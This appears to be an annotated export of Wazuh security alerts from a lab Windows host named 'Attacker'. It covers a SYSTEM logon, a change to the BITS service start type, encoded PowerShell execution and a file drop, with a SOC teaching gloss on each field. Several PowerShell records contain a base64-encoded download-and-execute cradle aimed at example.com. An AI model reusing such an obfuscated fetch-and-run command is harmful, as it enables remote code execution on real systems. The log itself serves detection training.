Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:29.1998112Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  44009
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:56:32.001+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:32.001+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535392.2856547
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:29.3906500Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  3076
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  10380
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:33.513+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:33.513+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  130
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535393.2858360
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:31.2111559Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350830
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:30.128 ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} ProcessId: 9136 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} ParentProcessId: 13544 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:30.128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19e-680a-fd0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c19b-680a-fa0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:33.645+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:33.645+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  134
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535393.2866427
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:31.4169608Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350839
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:31.361 ProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} ProcessId: 9136 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kiqaikxm.v25.ps1 CreationUtcTime: 2025-04-24 22:56:31.361 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:31.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19e-680a-fd0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kiqaikxm.v25.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:31.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:36.197+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:36.197+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  131
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535396.2869192
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:33.6258405Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350866
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:32.452 ProcessGuid: {94294ddc-c1a0-680a-ff0c-000000000e00} ProcessId: 10052 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c19e-680a-fd0c-000000000e00} ParentProcessId: 9136 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:32.452
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1a0-680a-ff0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

